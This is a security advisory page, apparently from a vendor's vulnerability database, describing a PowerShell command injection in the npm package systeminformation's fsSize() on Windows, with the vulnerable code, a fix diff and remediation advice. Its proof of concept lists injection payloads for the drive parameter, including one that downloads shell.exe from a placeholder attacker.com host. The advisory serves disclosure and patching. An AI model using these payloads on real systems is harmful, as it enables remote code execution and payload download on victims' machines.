How severe is GHSA-wphj-fx3q-84ch?

GHSA-wphj-fx3q-84ch has a CVSS score of 8.1/10, rated HIGH. Immediate patching is strongly recommended.

Which packages are affected by GHSA-wphj-fx3q-84ch?

GHSA-wphj-fx3q-84ch affects the following packages: systeminformation (npm). Ecosystems affected: npm.

How do I fix GHSA-wphj-fx3q-84ch?

Update systeminformation to 5.27.14 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-wphj-fx3q-84ch is resolved across your whole dependency graph.

How do I detect GHSA-wphj-fx3q-84ch in my npm dependencies?

Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for systeminformation. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

How do I mitigate GHSA-wphj-fx3q-84ch if there is no patch (or I can't update yet)?

If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

How does O3 Security protect against GHSA-wphj-fx3q-84ch?

O3 pinpoints whether GHSA-wphj-fx3q-84ch is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Is GHSA-wphj-fx3q-84ch actively exploited in the wild?

No public exploit code has been indexed for GHSA-wphj-fx3q-84ch yet. This does not mean the vulnerability cannot be exploited — absence of public exploits does not imply safety. Apply the recommended fix and use O3 Security to monitor your exposure.

What is the EPSS score for GHSA-wphj-fx3q-84ch?

GHSA-wphj-fx3q-84ch has an EPSS (Exploit Prediction Scoring System) score of 12.9%, placing it in the 96th percentile of all CVEs. EPSS is maintained by FIRST.org and estimates the probability that a vulnerability will be exploited in the wild within the next 30 days. This score warrants monitoring and prompt remediation.

What type of vulnerability is GHSA-wphj-fx3q-84ch?

GHSA-wphj-fx3q-84ch is classified as OS Command Injection (CWE-78). This weakness type describe the underlying flaw category, which helps determine the potential impact and the right class of mitigation. This is a high-impact weakness class that often enables remote code execution or data exposure.

When was GHSA-wphj-fx3q-84ch published, and has it been updated?

GHSA-wphj-fx3q-84ch was published on December 16, 2025 and was last updated on February 4, 2026. Advisory data evolves as severity scores, affected ranges, and exploit intelligence are revised — always check the latest version of the advisory before acting.

📦 npm

GHSA-wphj-fx3q-84ch

HIGH

systeminformation has a Command Injection vulnerability in fsSize() function on Windows

Also known asCVE-2025-68154

Published

Dec 16, 2025

Updated

Feb 4, 2026

Affected

1 pkg

Patched

1 / 1

Exploits

None indexed

EPSS Exploitation Probability

via FIRST.org ↗

12.9%probability of exploitation in next 30 days

Moderate Risk96th percentile+12.81%

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected

Weekly download volume for affected packages — a proxy for how broadly this vulnerability is deployed.

systeminformationnpm

9.0Mdownloads / week

Description

Summary

The fsSize() function in systeminformation is vulnerable to OS Command Injection (CWE-78) on Windows systems. The optional drive parameter is directly concatenated into a PowerShell command without sanitization, allowing arbitrary command execution when user-controlled input reaches this function.

Affected Platforms: Windows only

CVSS Breakdown:

Attack Vector (AV:N): Network - if used in a web application/API
Attack Complexity (AC:H): High - requires application to pass user input to fsSize()
Privileges Required (PR:N): None - no authentication required at library level
User Interaction (UI:N): None
Scope (S:U): Unchanged - executes within Node.js process context
Confidentiality/Integrity/Availability (C:H/I:H/A:H): High impact if exploited

Note: The actual exploitability depends on how applications use this function. If an application does not pass user-controlled input to fsSize(), it is not vulnerable.

Details

Vulnerable Code Location

File: lib/filesystem.js, Line 197

if (_windows) {
  try {
    const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? '| where -property Caption -eq ' + drive : ''} | fl`;
    util.powerShell(cmd).then((stdout, error) => {

The drive parameter is concatenated directly into the PowerShell command string without any sanitization.

Why This Is a Vulnerability

This is inconsistent with the security pattern used elsewhere in the codebase. Other functions properly sanitize user input using util.sanitizeShellString():

File	Line	Function	Sanitization
`lib/processes.js`	141	`services()`	✅ `util.sanitizeShellString(srv)`
`lib/processes.js`	1006	`processLoad()`	✅ `util.sanitizeShellString(proc)`
`lib/network.js`	1253	`networkStats()`	✅ `util.sanitizeShellString(iface)`
`lib/docker.js`	472	`dockerContainerStats()`	✅ `util.sanitizeShellString(containerIDs, true)`
`lib/filesystem.js`	197	`fsSize()`	❌ No sanitization

The sanitizeShellString() function (defined at lib/util.js:731) removes dangerous characters like ;, &, |, $, `, #, etc., which would prevent command injection.

PoC

Attack Scenario

An application exposes disk information via an API and passes user input to si.fsSize():

// Vulnerable application example
const si = require('systeminformation');
const http = require('http');
const url = require('url');

http.createServer(async (req, res) => {
  const parsedUrl = url.parse(req.url, true);
  const drive = parsedUrl.query.drive; // User-controlled input
  
  // VULNERABLE: User input passed directly to fsSize()
  const diskInfo = await si.fsSize(drive);
  
  res.end(JSON.stringify(diskInfo));
}).listen(3000);

Exploitation

Normal Request:

GET /api/disk?drive=C:

Malicious Request (Command Injection):

GET /api/disk?drive=C:;%20whoami%20%23

Command Construction Demonstration

The following demonstrates how commands are constructed with malicious input:

Normal usage:

Input: "C:"
Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C: | fl

With injection payload C:; whoami #:

Input: "C:; whoami #"
Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; whoami # | fl
                                                                                                                            ↑         ↑
                                                                                                            semicolon terminates    # comments out rest
                                                                                                            first command

PowerShell will execute:

Get-WmiObject Win32_logicaldisk | ... | where -property Caption -eq C: (original command)
whoami (injected command)
Everything after # is commented out

PoC Script

/**
 * Command Injection PoC - systeminformation fsSize()
 * 
 * Run with: node poc.js
 * Requires: npm install systeminformation
 */

const os = require('os');

// Simulates the vulnerable command construction from filesystem.js:197
function simulateVulnerableCommand(drive) {
  const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? '| where -property Caption -eq ' + drive : ''} | fl`;
  return cmd;
}

// Test payloads
const payloads = [
  { name: 'Normal', input: 'C:' },
  { name: 'Command Execution', input: 'C:; whoami #' },
  { name: 'Data Exfiltration', input: 'C:; Get-Process | Out-File C:\\temp\\procs.txt #' },
  { name: 'Remote Payload', input: 'C:; Invoke-WebRequest http://attacker.com/shell.exe -OutFile C:\\temp\\shell.exe #' },
];

console.log('=== Command Injection PoC ===\n');
console.log(`Platform: ${os.platform()}`);
console.log(`Note: Actual exploitation requires Windows\n`);

payloads.forEach(p => {
  console.log(`[${p.name}]`);
  console.log(`  Input: ${p.input}`);
  console.log(`  Command: ${simulateVulnerableCommand(p.input)}\n`);
});

PoC Output

=== Command Injection PoC ===

Platform: win32
Note: Actual exploitation requires Windows

[Normal]
  Input: C:
  Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C: | fl

[Command Execution]
  Input: C:; whoami #
  Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; whoami # | fl

[Data Exfiltration]
  Input: C:; Get-Process | Out-File C:\temp\procs.txt #
  Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; Get-Process | Out-File C:\temp\procs.txt # | fl

[Remote Payload]
  Input: C:; Invoke-WebRequest http://attacker.com/shell.exe -OutFile C:\temp\shell.exe #
  Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; Invoke-WebRequest http://attacker.com/shell.exe -OutFile C:\temp\shell.exe # | fl

As shown, the attacker's commands are injected directly into the PowerShell command string.

Impact

Who Is Affected?

Applications running systeminformation on Windows that pass user-controlled input to fsSize(drive)
Web applications, APIs, or CLI tools that accept drive letters from users
Monitoring dashboards that allow users to specify which drives to query

Potential Attack Scenarios

Remote Code Execution (RCE) - Execute arbitrary commands with Node.js process privileges
Data Exfiltration - Read sensitive files and exfiltrate data
Privilege Escalation - If Node.js runs with elevated privileges
Lateral Movement - Use the compromised system to attack internal network
Ransomware Deployment - Download and execute malicious payloads

Recommended Fix

Apply util.sanitizeShellString() to the drive parameter, consistent with other functions in the codebase:

  if (_windows) {
    try {
+     const driveSanitized = drive ? util.sanitizeShellString(drive, true) : '';
-     const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? '| where -property Caption -eq ' + drive : ''} | fl`;
+     const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${driveSanitized ? '| where -property Caption -eq ' + driveSanitized : ''} | fl`;
      util.powerShell(cmd).then((stdout, error) => {

The true parameter enables strict mode which removes additional characters like spaces and parentheses.

systeminformation thanks developers working on the project. The Systeminformation Project hopes this report helps improve the its security. Please systeminformation know if any additional information or clarification is needed.

Affected Packages

1 total 1 fixed

Ecosystem	Package	Vulnerable range	Fix
📦npm	`systeminformation`	all versions	5.27.14

Detection & mitigation playbook

Open-source dependency

Detect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for systeminformation. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update systeminformation to 5.27.14 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-wphj-fx3q-84ch is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-wphj-fx3q-84ch is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-wphj-fx3q-84ch. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

## Summary The `fsSize()` function in `systeminformation` is vulnerable to **OS Command Injection (CWE-78)** on Windows systems. The optional `drive` parameter is directly concatenated into a PowerShell command without sanitization, allowing arbitrary command execution when user-controlled input reaches this function. **Affected Platforms:** Windows only **CVSS Breakdown:** - **Attack Vector (AV:N):** Network - if used in a web application/API - **Attack Complexity (AC:H):** High - requires application to pass user input to `fsSize()` - **Privileges Required (PR:N):** None - no authentica

O3 Security · Impact-Aware SCA

Is GHSA-wphj-fx3q-84ch in your dependencies?

O3 detects GHSA-wphj-fx3q-84ch across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works